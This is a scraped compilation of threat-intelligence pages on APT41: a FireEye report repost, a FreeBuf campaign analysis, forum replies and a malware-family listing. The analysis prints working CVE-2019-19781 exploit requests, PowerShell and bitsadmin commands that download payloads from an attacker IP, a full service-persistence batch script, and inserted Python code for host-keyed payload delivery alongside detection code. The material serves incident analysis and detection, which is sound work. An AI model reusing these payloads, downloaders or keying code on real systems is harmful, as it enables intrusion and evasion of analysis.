Process Injection: Dynamic-link Library Injection,
Scheduled Transfer,
System Information Discovery,
System Network Configuration Discovery,
System Owner/User Discovery,
System Time Discovery
S0430 Winnti for Linux [3]
Application Layer Protocol: Web Protocols,
Deobfuscate/Decode Files or Information,
Encrypted Channel: Symmetric Cryptography,
Ingress Tool Transfer,
Non-Application Layer Protocol,
Obfuscated Files or Information,
Rootkit,
Traffic Signaling
S0412 ZxShell [1]
Access Token Manipulation: Create Process with Token,
Application Layer Protocol: Web Protocols,
Application Layer Protocol: File Transfer Protocols,
Command and Scripting Interpreter: Windows Command Shell,
Create Account: Local Account,
Create or Modify System Process: Windows Service,
Data from Local System,
Endpoint Denial of Service,
Exploit Public-Facing Application,
File and Directory Discovery,
Impair Defenses: Disable or Modify System Firewall,
Impair Defenses: Disable or Modify Tools,
Indicator Removal: Clear Windows Event Logs,
Indicator Removal: File Deletion,
Ingress Tool Transfer,
Input Capture: Credential API Hooking,
Input Capture: Keylogging,
Modify Registry,
Native API,
Network Service Discovery,
Non-Standard Port,
Process Discovery,
Process Injection: Dynamic-link Library Injection,
Proxy,
Query Registry,
Remote Services: VNC,
Remote Services: Remote Desktop Protocol,
Screen Capture,
System Binary Proxy Execution: Rundll32,
System Information Discovery,
System Owner/User Discovery,
System Service Discovery,
System Services: Service Execution,
Video Capture
References
Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.
Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.
Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.
Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved July 8, 2022.
Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020.
Carr, N. (2019, October 30). Nick Carr Status Update APT41 Environmental Keying. Retrieved June 23, 2020.
Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who’s Reading Your Text Messages?. Retrieved May 11, 2020.
Insikt Group. (2021, February 28). China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions. Retrieved March 22, 2021.
© 2015 - 2024, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation.
The original text of the US company FireEye's investigation report on APT41 - Zhihu

Post by 烟斗汪game: I think FireEye is a dangerous American company that seriously threatens China's network security. Honestly, it is definitely a lackey of the US government! The original text follows:

Threat Research
APT41: A Dual Espionage and Cyber Crime Operation
August 07, 2019 | by Nalani Fraser, Fred Plan, Jacqueline O'Leary, Vincent Cannon, Raymond Leong, Dan Perez, ...

Today, FireEye Intelligence is releasing a comprehensive report detailing APT41, a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations. APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain. Explicit financially-motivated targeting is unusual among Chinese state-sponsored threat groups, and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward.

The full published report covers historical and ongoing activity attributed to APT41, the evolution of the group's tactics, techniques, and procedures (TTPs), information on the individual actors, an overview of their malware toolset, and how these identifiers overlap with other known Chinese espionage operators. APT41 partially coincides with public reporting on groups including BARIUM (Microsoft) and Winnti (Kaspersky, ESET, Clearsky).

Who Does APT41 Target?

Like other Chinese espionage operators, APT41 espionage targeting has generally aligned with China's Five-Year economic development plans. The group has established and maintained strategic access to organizations in the healthcare, high-tech, and telecommunications sectors. APT41 operations against higher education, travel services, and news/media firms provide some indication that the group also tracks individuals and conducts surveillance. For example, the group has repeatedly targeted call record information at telecom companies. In another instance, APT41 targeted a hotel's reservation systems ahead of Chinese officials staying there, suggesting the group was tasked to reconnoiter the facility for security reasons.

The group's financially motivated activity has primarily focused on the video game industry, where APT41 has manipulated virtual currencies and even attempted to deploy ransomware. The group is adept at moving laterally within targeted networks, including pivoting between Windows and Linux systems, until it can access game production environments. From there, the group steals source code as well as digital certificates which are then used to sign malware. More importantly, APT41 is known to use its access to production environments to inject malicious code into legitimate files which are later distributed to victim organizations. These supply chain compromise tactics have also been characteristic of APT41's best known and most recent espionage campaigns.

Interestingly, despite the significant effort required to execute supply chain compromises and the large number of affected organizations, APT41 limits the deployment of follow-on malware to specific victim systems by matching against individual system identifiers. These multi-stage operations restrict malware delivery only to intended victims and significantly obfuscate the intended targets. In contrast, a typical spear-phishing campaign's desired targeting can be discerned based on recipients' email addresses.

A breakdown of industries directly targeted by APT41 over time can be found in Figure 1.

Figure 1: Timeline of industries directly targeted by APT41

Probable Chinese Espionage Contractors

Two identified personas using the monikers "Zhang Xuguang" and "Wolfzhi" linked to APT41 operations have also been identified in Chinese-language forums. These individuals advertised their skills and services and indicated that they could be hired. Zhang listed his online hours as 4:00pm to 6:00am, similar to APT41 operational times against online gaming targets and suggesting that he is moonlighting. Mapping the group's activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs.

Attribution to these individuals is backed by identified persona information, their previous work and apparent expertise in programming skills, and their targeting of Chinese market-specific online games. The latter is especially notable because APT41 has repeatedly returned to targeting the video game industry and we believe these activities were formative in the group's later espionage operations.

Figure 2: Operational activity for gaming versus non-gaming-related targeting based on observed operations since 2012

The Right Tool for the Job

APT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions, including publicly available utilities, malware shared with other Chinese espionage operations, and tools unique to the group. The group often relies on spear-phishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims. Once in a victim organization, APT41 can leverage more sophisticated TTPs and deploy additional malware. For example, in a campaign running almost a year, APT41 compromised hundreds of systems and used close to 150 unique pieces of malware including backdoors, credential stealers, keyloggers, and rootkits.

APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems. The use of bootkits in particular adds an extra layer of stealth because the code is executed prior to the operating system initializing. The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets.

Fast and Relentless

APT41 quickly identifies and compromises intermediary systems that provide access to otherwise segmented parts of an organization's network. In one case, the group compromised hundreds of systems across multiple network segments and several geographic regions in as little as two weeks.

The group is also highly agile and persistent, responding quickly to changes in victim environments and incident responder activity. Hours after a victimized organization made changes to thwart APT41, for example, the group compiled a new version of a backdoor using a freshly registered command-and-control domain and compromised several systems across multiple geographic regions. In a different instance, APT41 sent spear-phishing emails to multiple HR employees three days after an intrusion had been remediated and systems were brought back online. Within hours of a user opening a malicious attachment sent by APT41, the group had regained a foothold within the organization's servers across multiple geographic regions.

Looking Ahead

APT41 is a creative, skilled, and well-resourced adversary, as highlighted by the operation's distinct use of supply chain compromises to target select individuals, consistent signing of malware using compromised digital certificates, and deployment of bootkits (which is rare among Chinese APT groups).

Like other Chinese espionage operators, APT41 appears to have moved toward strategic intelligence collection and establishing access and away from direct intellectual property theft since 2015. This shift, however, has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons. The group's capabilities and targeting have both broadened over time, signaling the potential for additional supply chain compromises affecting a variety of victims in additional verticals.

APT41's links to both underground marketplaces and state-sponsored activity may indicate the group enjoys protections that enables it to conduct its own for-profit activities, or authorities are willing to overlook them. It is also possible that APT41 has simply evaded scrutiny from Chinese authorities. Regardless, these operations underscore a blurred line between state power and crime that lies at the heart of threat ecosystems and is exemplified by APT41.

(Images were not uploaded in the post.)
Published 2019-10-12 23:52
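The report's point that follow-on malware is "delivered only to intended victims by matching against individual system identifiers" (the environmental keying also cited in the ATT&CK references above) is easier to reason about with a concrete mechanism in front of you. The following is an added illustration, not FireEye's or APT41's code: a stage-one loader carries only ciphertext plus an HMAC tag, derives the key from a host identifier, and therefore yields nothing on any machine whose identifier was not used at sealing time. The identifier format (hostname plus MAC), the SHA-256 counter-mode stream cipher and all hostnames are assumptions made for the example.

```python
import hashlib
import hmac

# All identifiers, hostnames and payloads below are constructed for this
# example; they are not indicators from the FireEye report.

TAG_LEN = 32


def derive_key(identifier: str) -> bytes:
    """Derive the stage-two key from a host identifier (hostname|MAC here).

    The loader ships only ciphertext and tag, never the key or the plaintext
    identifier, so without the intended host's identifier an analyst cannot
    recover the second stage from the loader alone.
    """
    return hashlib.sha256(b"stage2-key|" + identifier.encode("utf-8")).digest()


def _keystream(key: bytes, length: int) -> bytes:
    """SHA-256 in counter mode as a toy stream cipher (illustration only)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:length])


def seal_for_host(identifier: str, payload: bytes) -> bytes:
    """Encrypt and authenticate a payload so only `identifier` can open it."""
    key = derive_key(identifier)
    ciphertext = bytes(a ^ b for a, b in zip(payload, _keystream(key, len(payload))))
    tag = hmac.new(key, ciphertext, hashlib.sha256).digest()
    return tag + ciphertext


def try_unseal(identifier: str, blob: bytes):
    """Return the payload if this host is the intended one, else None.

    The HMAC check is what makes the behaviour silent: a sandbox or an
    un-targeted host gets no garbage to execute, the loader simply does nothing.
    """
    if len(blob) < TAG_LEN:
        return None
    tag, ciphertext = blob[:TAG_LEN], blob[TAG_LEN:]
    key = derive_key(identifier)
    expected = hmac.new(key, ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return bytes(a ^ b for a, b in zip(ciphertext, _keystream(key, len(ciphertext))))


def deploy_on(identifier: str, blobs: list) -> list:
    """Stage-one behaviour: try every embedded blob against this host."""
    return [p for p in (try_unseal(identifier, b) for b in blobs) if p is not None]


def demo() -> dict:
    """Two intended victims and one sandbox; only the victims get a payload."""
    victims = ["HR-WS-0117|00:11:22:33:44:55", "BUILD-SRV-02|00:11:22:33:44:66"]
    blobs = [seal_for_host(v, f"stage2 for {v}".encode()) for v in victims]
    hosts = victims + ["SANDBOX-VM|de:ad:be:ef:00:01"]
    return {h: deploy_on(h, blobs) for h in hosts}
```

Run `demo()` and the sandbox entry comes back empty while each victim recovers exactly its own payload. The defensive consequence is the one the report draws: detonating the first stage in an analysis environment reveals the targeting only if the analyst can reproduce the victim's identifier, so host telemetry from the actual victim matters more than the sample itself.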
APT41 multi-vulnerability attack campaign analysis - FreeBuf (Network Security)
2020-04-20 13:00:41
Researchers found that APT41 has been running a wide-ranging campaign since the start of this year. Between January 20 and March 11 APT41 exploited vulnerabilities in Citrix NetScaler/ADC, Cisco routers and Zoho ManageEngine Desktop Central. Targeted countries include Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, the Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, the UAE, the UK and the US. Targeted industries include banking/finance, construction, defense industrial base, government, healthcare, high technology, higher education, legal, manufacturing, media, oil and gas, pharmaceuticals, real estate, telecommunications, transportation and travel. It is not yet clear whether APT41 scanned the whole internet for mass exploitation or picked specific targets, but from the victims' perspective the attacks look targeted.

Vulnerability exploitation

CVE-2019-19781 (Citrix Application Delivery Controller [ADC])

Starting January 20, 2020, APT41 used the IP address 66.42.98[.]220 to attempt exploitation of CVE-2019-19781 (published December 17, 2019).

Timeline: the first CVE-2019-19781 exploitation occurred on January 20 and 21, 2020, and executed the command `file /bin/pwd`. This first confirms whether the system is vulnerable and whether the mitigation has been applied, and then returns the target's architecture, which informs APT41's later backdoor deployment. All observed requests were made only against Citrix devices, so APT41 was working from a list of known devices.

Sample HTTP POST:

```
POST /vpns/portal/scripts/newbm.pl HTTP/1.1
Host: [redacted]
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0
NSC_NONCE: nsroot
NSC_USER: ../../../netscaler/portal/templates/[redacted]
Content-Length: 96

url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %]
```

APT41's activity paused between January 23 and February 1. From February 1 APT41 resumed exploiting CVE-2019-19781, with payloads now downloaded over FTP. APT41 executed the command `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd`, which connects to 66.42.98[.]220, logs in to the FTP server with the username "test" and a password, and downloads the "bsd" payload (probably a backdoor).

Sample HTTP POST:

```
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Accept-Encoding: identity
Content-Length: 147
Connection: close
Nsc_User: ../../../netscaler/portal/templates/[redacted]
User-Agent: Python-urllib/2.7
Nsc_Nonce: nsroot
Host: [redacted]
Content-Type: application/x-www-form-urlencoded

url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd`') %]
```

On February 24 and 25 the number of CVE-2019-19781 exploitation attempts rose sharply; only the payload name changed.

```
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Accept-Encoding: identity
Content-Length: 145
Connection: close
Nsc_User: ../../../netscaler/portal/templates/[redacted]
User-Agent: Python-urllib/2.7
Nsc_Nonce: nsroot
Host: [redacted]
Content-Type: application/x-www-form-urlencoded

url=http://example.com&title= [redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un`') %]
```

Cisco Router

On February 21, 2020, APT41 successfully compromised a Cisco RV320 router at a telecommunications organization and downloaded a 64-bit MIPS payload named "fuc" (MD5: 155e98e5ca8d662fad7dc84187340cbc). A Metasploit module chains two CVEs (CVE-2019-1653 and CVE-2019-1652) to obtain remote code execution on Cisco RV320 and RV325 small business routers and uses wget to download the payload. 66.42.98[.]220 also hosted the file http://66.42.98[.]220/test/1.txt (MD5: c0c467c8e9b2046d7053642cc9bdd57d), whose content is `cat /etc/flash/etc/nk_sysconfig`, a command that prints the current configuration when run on a Cisco RV320 router.

- Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability
- Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability

CVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability)

On March 5 researchers published proof-of-concept code for CVE-2020-10189. From March 8 APT41 used 91.208.184[.]78 to attempt exploitation of the Zoho ManageEngine vulnerability. The payloads (install.bat and storesyncsvc.dll) were delivered in two different variants. In the first variant, CVE-2020-10189 was used to upload "logger.zip" directly; it contains a set of commands that use PowerShell to download and execute install.bat and storesyncsvc.dll. Strings from the serialized Java class inside it:

```
java/lang/Runtime
getRuntime
()Ljava/lang/Runtime;
Xcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/install.bat','C:\Windows\Temp\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/storesyncsvc.dll','C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.bat
'(Ljava/lang/String;)Ljava/lang/Process;
StackMapTable
ysoserial/Pwner76328858520609
Lysoserial/Pwner76328858520609;
```

In the second variant APT41 used the Microsoft BITSAdmin tool to download install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from 66.42.98[.]220 on port 12345.

```
Parent Process: C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe
Process Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:\Users\Public\install.bat
```

Both variants use the install.bat batch file to install a service backed by storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f). Contents of install.bat (the misspelling "collectly" in the description string is in the original and is itself a usable indicator):

```bat
@echo off
set "WORK_DIR=C:\Windows\System32"
set "DLL_NAME=storesyncsvc.dll"
set "SERVICE_NAME=StorSyncSvc"
set "DISPLAY_NAME=Storage Sync Service"
set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly."
sc stop %SERVICE_NAME%
sc delete %SERVICE_NAME%
mkdir %WORK_DIR%
copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Y
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "%SERVICE_NAME%" /t REG_MULTI_SZ /d "%SERVICE_NAME%" /f
sc create "%SERVICE_NAME%" binPath= "%SystemRoot%\system32\svchost.exe -k %SERVICE_NAME%" type= share start= auto error= ignore DisplayName= "%DISPLAY_NAME%"
SC failure "%SERVICE_NAME%" reset= 86400 actions= restart/60000/restart/60000/restart/60000
sc description "%SERVICE_NAME%" "%DESCRIPTION%"
reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "%WORK_DIR%\%DLL_NAME%" /f
net start "%SERVICE_NAME%"
```

Communication with the C2 server:

```
GET /jquery-3.3.1.min.js HTTP/1.1
Host: cdn.bootcss.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cdn.bootcss.com/
Accept-Encoding: gzip, deflate
Cookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYMDA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLI
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
```

Within hours of exploitation, APT41 used the storesyncsvc.dll BEACON backdoor to download a secondary backdoor with a different C2 address, and then downloaded 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c). 2.exe is a VMProtect-packed Meterpreter downloader used to fetch Cobalt Strike BEACON shellcode. The group layers several stages like this to delay analysis of its other tools.

Summary

The scanning and exploitation in this APT41 campaign show that the group is adopting new exploits faster and faster and is widening the range of targets it collects against. APT41 had earlier been confirmed to have successfully exploited CVE-2019-3396 (Atlassian Confluence) against a US university. APT41 is evidently carrying out financially motivated activity alongside its espionage.

IOCs

CVE-2019-19781 Exploitation (Citrix Application Delivery Controller):
- 66.42.98[.]220
- CVE-2019-19781 exploitation attempts with a payload of 'file /bin/pwd'
- CVE-2019-19781 exploitation attempts with a payload of '/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/bsd'
- CVE-2019-19781 exploitation attempts with a payload of '/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un'
- /tmp/bsd
- /tmp/un

Cisco Router Exploitation:
- 66.42.98[.]220
- '1.txt' (MD5: c0c467c8e9b2046d7053642cc9bdd57d)
- 'fuc' (MD5: 155e98e5ca8d662fad7dc84187340cbc)

CVE-2020-10189 (Zoho ManageEngine Desktop Central):
- 66.42.98[.]220
- 91.208.184[.]78
- 74.82.201[.]8
- exchange.dumb1[.]com
- install.bat (MD5: 7966c2c546b71e800397a67f942858d0)
- storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f)
- C:\Windows\Temp\storesyncsvc.dll
- C:\Windows\Temp\install.bat
- 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c)
- C:\Users\[redacted]\install.bat
- TzGG (MD5: 659bd19b562059f3f0cc978e15624fd9)
- C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe spawning cmd.exe and/or bitsadmin.exe
- Certutil.exe downloading 2.exe and/or payloads from 91.208.184[.]78
- PowerShell downloading files with Net.WebClient

Detection signatures

Endpoint Security: BITSADMIN.EXE MULTISTAGE DOWNLOADER (METHODOLOGY); CERTUTIL.EXE DOWNLOADER A (UTILITY); Generic.mg.5909983db4d9023e; Generic.mg.3e856162c36b5329; POWERSHELL DOWNLOADER (METHODOLOGY); SUSPICIOUS BITSADMIN USAGE B (METHODOLOGY)

Network Security: Backdoor.Meterpreter; DTI.Callback; Exploit.CitrixNetScaler; Trojan.METASTAGE; Exploit.ZohoManageEngine.CVE-2020-10198.Pwner; Exploit.ZohoManageEngine.CVE-2020-10198.mdmLogUploader

Helix: CITRIX ADC [Suspicious Commands]; EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Attempt]; EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Success]; EXPLOIT - CITRIX ADC [CVE-2019-19781 Payload Access]; EXPLOIT - CITRIX ADC [CVE-2019-19781 Scanning]; MALWARE METHODOLOGY [Certutil User-Agent]; WINDOWS METHODOLOGY [BITSadmin Transfer]; WINDOWS METHODOLOGY [Certutil Downloader]

ATT&CK Techniques

Initial Access: External Remote Services (T1133), Exploit Public-Facing Application (T1190)
Execution: PowerShell (T1086), Scripting (T1064)
Persistence: New Service (T1050)
Privilege Escalation: Exploitation for Privilege Escalation (T1068)
Command and Control: Remote File Copy (T1105), Commonly Used Port (T1436), Uncommonly Used Port (T1065), Custom Command and Control Protocol (T1094), Data Encoding (T1132), Standard Application Layer Protocol (T1071)
Defense Evasion: BITS Jobs (T1197), Process Injection (T1055)

Source: FireEye; compiled by Kriston for FreeBuf.COM.
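The requests and the install.bat above give enough shape to write detection logic rather than just hashes. The following is an added example, not FireEye's or FreeBuf's code: one function classifies a raw HTTP request against the CVE-2019-19781 pattern (newbm.pl plus traversal in the URL or NSC_USER, then the Template Toolkit injection in `desc=`) and names the stage it corresponds to; a second walks process-creation and registry events for the ManageEngine java.exe spawning a shell or downloader and for a service that both registers a new svchost group and sets a ServiceDll, which is the pair install.bat creates. Telemetry is constructed inline; hostnames, the FTP password and the event schema are assumptions for the example.

```python
import re

# Constructed telemetry for this example. The request shapes follow the samples
# quoted in the article; hostnames, paths and the FTP password are made up.

CITRIX_PATH = "/vpns/portal/scripts/newbm.pl"
INJECTED_CMD = re.compile(r"template\.new\(.*?`([^`]*)`", re.S)
DOWNLOADER = re.compile(r"(?:/usr/bin/|/bin/)?(?:ftp|wget|curl)\b")


def classify_citrix_request(raw: str):
    """Classify one raw HTTP request against the CVE-2019-19781 pattern.

    None for traffic that never touches the vulnerable script; otherwise 'stage'
    is scan (newbm.pl reached, no injection), recon ('file /bin/pwd' architecture
    check), payload_fetch (injected command downloads a file) or exploit.
    """
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    if not lines:
        return None
    method, path = (lines[0].split() + ["", ""])[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # Traversal may sit in the URL (/vpn/../vpns/) or in NSC_USER, the header
    # that makes the template write land outside the intended directory.
    traversal = "/../vpns/" in path or ".." in headers.get("nsc_user", "")
    if CITRIX_PATH not in path and not traversal:
        return None
    m = INJECTED_CMD.search(body)
    if m is None:
        return {"stage": "scan", "method": method, "command": None, "drops": None}
    cmd = m.group(1).strip()
    if cmd.startswith("file /bin/pwd"):
        stage = "recon"
    elif DOWNLOADER.match(cmd):
        stage = "payload_fetch"
    else:
        stage = "exploit"
    drop = re.search(r"-o\s+(\S+)", cmd)  # local path the downloader writes to
    return {"stage": stage, "method": method, "command": cmd,
            "drops": drop.group(1) if drop else None}


def find_service_persistence(process_events, registry_events):
    """Flag java.exe -> cmd/bitsadmin/powershell and the svchost group + ServiceDll
    pair that install.bat registers. Events are dicts: process events carry
    'parent', 'image', 'cmdline'; registry events carry 'key', 'value', 'data'.
    """
    findings = []
    for ev in process_events:
        parent, image, cmd = ev["parent"].lower(), ev["image"].lower(), ev["cmdline"]
        if parent.endswith("\\java.exe") and "desktopcentral" in parent and \
                image.endswith(("\\cmd.exe", "\\bitsadmin.exe", "\\powershell.exe")):
            findings.append(("java_spawns_shell", cmd))
        if re.search(r"bitsadmin(\.exe)?\s+/transfer", cmd, re.I) or \
                re.search(r"Net\.WebClient|DownloadFile\(", cmd) or \
                re.search(r"certutil(\.exe)?\b.*-urlcache", cmd, re.I):
            findings.append(("lolbin_download", cmd))
    # Only a service that got a NEW svchost group AND a ServiceDll is flagged;
    # built-in services already have their group, so they never produce both.
    new_groups = {ev["value"].lower() for ev in registry_events
                  if ev["key"].lower().endswith("\\windows nt\\currentversion\\svchost")}
    for ev in registry_events:
        key = ev["key"].lower()
        if key.endswith("\\parameters") and ev["value"].lower() == "servicedll":
            svc = key.split("\\services\\")[-1].split("\\")[0]
            if svc in new_groups:
                findings.append(("new_svchost_group_with_servicedll", f"{svc} -> {ev['data']}"))
    return findings


RECON_REQ = (
    "POST /vpns/portal/scripts/newbm.pl HTTP/1.1\n"
    "Host: gw.example.test\nUser-Agent: python-requests/2.22.0\n"
    "NSC_NONCE: nsroot\nNSC_USER: ../../../netscaler/portal/templates/x\n\n"
    "url=http://example.com&title=x&desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %]\n"
)
FETCH_REQ = (
    "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1\n"
    "Host: gw.example.test\nUser-Agent: Python-urllib/2.7\n"
    "Nsc_User: ../../../netscaler/portal/templates/x\nNsc_Nonce: nsroot\n\n"
    "url=http://example.com&title=x&desc=[% template.new('BLOCK' = 'print "
    "`/usr/bin/ftp -o /tmp/bsd ftp://test:pw@66.42.98[.]220/bsd`') %]\n"
)
BENIGN_REQ = "GET /vpn/index.html HTTP/1.1\nHost: gw.example.test\n\n"
PROCESS_EVENTS = [
    {"parent": r"C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:\Users\Public\install.bat"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]
REGISTRY_EVENTS = [
    {"key": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost", "value": "StorSyncSvc", "data": "StorSyncSvc"},
    {"key": r"HKLM\SYSTEM\CurrentControlSet\Services\StorSyncSvc\Parameters", "value": "ServiceDll",
     "data": r"C:\Windows\System32\storesyncsvc.dll"},
    {"key": r"HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters", "value": "ServiceDll",
     "data": r"%SystemRoot%\System32\dnsrslvr.dll"},  # legitimate, must not fire
]


def demo():
    """Run both detectors over the constructed telemetry."""
    return {"requests": [classify_citrix_request(r) for r in (RECON_REQ, FETCH_REQ, BENIGN_REQ)],
            "host": find_service_persistence(PROCESS_EVENTS, REGISTRY_EVENTS)}
```

`demo()` labels the first request recon, the second payload_fetch dropping to /tmp/bsd, and the plain GET as nothing; on the host side it reports the java.exe child, the bitsadmin transfer, and StorSyncSvc with its ServiceDll, while the Dnscache ServiceDll event stays quiet because no new svchost group was created for it. The requirement that the group registration and the ServiceDll both appear is what keeps this rule from firing on every Windows service.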
How should we view the APT41 attack on the TeamViewer company? - Zhihu

Question (tags: network security, hackers, information security, DDoS): What is APT41's main purpose in attacking TeamViewer, and what impact will this have on organizations and companies in China? [image]

Answer by 西帅 ("I'm on Zhihu to listen to stories"): APT41 is not an overseas group; TeamViewer and other English-language organizations have not reported this; the Weibo post has already been deleted by its author; and the image is a record from 2017.
Published 2019-10-12 14:39

Answer by a Zhihu user: A false alarm. APT41 is a domestic hacker group, there is no first-hand evidence either, and this is something from a few years ago. As things stand, no foreign security company has indicated any knowledge of it; Symantec, Kaspersky and others have made no comment, and TeamViewer has not issued any view or official statement on the event. Meanwhile certain domestic security vendors are making a big deal out of the so-called Shenzhen network security notice, whose authenticity is unknown. Heh.
Qi An Xin: No recent incident of TeamViewer being attacked and implanted with malicious code has been found, so there is no need for unnecessary panic. As for whether using TeamViewer, a remote-control tool that can punch straight through the firewall, complies with your company's or organization's security policy, please decide carefully.
Edited 2019-10-12 21:17
APT41 (Threat Actor)
APT41
(Back to overview)
aka: Amoeba, BARIUM, BRONZE ATLAS, BRONZE EXPORT, Blackfly, Brass Typhoon, Earth Baku, G0044, G0096, Grayfly, HOODOO, LEAD, Red Kelpie, TA415, WICKED PANDA, WICKED SPIDER
APT41 is a prolific cyber threat group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity potentially outside of state control.
Associated Families
elf.messagetap
win.biopass
win.coldlock
win.crackshot
win.dboxagent
win.easynight
win.highnoon
win.highnoon_bin
win.jumpall
win.poisonplug
win.serialvlogger
win.zxshell
apk.dragonegg
win.chinachopper
win.acehash
win.blackcoffee
win.crosswalk
win.derusbi
win.gearshift
win.lowkey
win.moonbounce
win.skip20
elf.keyplug
apk.wyrmspy
win.cobalt_strike
win.plugx
win.shadowpad
Cobalt Strike
ISFB
SystemBC
Vidar
×Select Content2023-03-28
⋅
ExaTrack
⋅
ExaTrackMélofée: a new alien malware in the Panda's toolset targeting Linux hosts HelloBot
Melofee
Winnti
Cobalt Strike
SparkRAT
STOWAWAY
×Select Content2023-03-27
⋅
⋅
Google Cybersecurity Action TeamThreat Horizons: April 2023 Threat Horizons Report Gdrive
APT41
×Select Content2023-03-10
⋅
Medium walmartglobaltech
⋅
Jason Reaves,
Joshua PlattFrom Royal With Love Cobalt Strike
Conti
PLAY
Royal Ransom
Somnia
×Select Content2023-03-09
⋅
ASEC
⋅
SanseoPlugX Malware Being Distributed via Vulnerability Exploitation PlugX
×Select Content2023-03-09
⋅
Sophos
⋅
Gabor SzappanosA border-hopping PlugX USB worm takes its act on the road PlugX
×Select Content2023-03-01
⋅
Zscaler
⋅
Meghraj Nandanwar,
Shatak JainOneNote: A Growing Threat for Malware Distribution AsyncRAT
Cobalt Strike
IcedID
QakBot
RedLine Stealer
×Select Content2023-02-24
⋅
Trend Micro
⋅
Buddy Tancio,
Catherine Loveria,
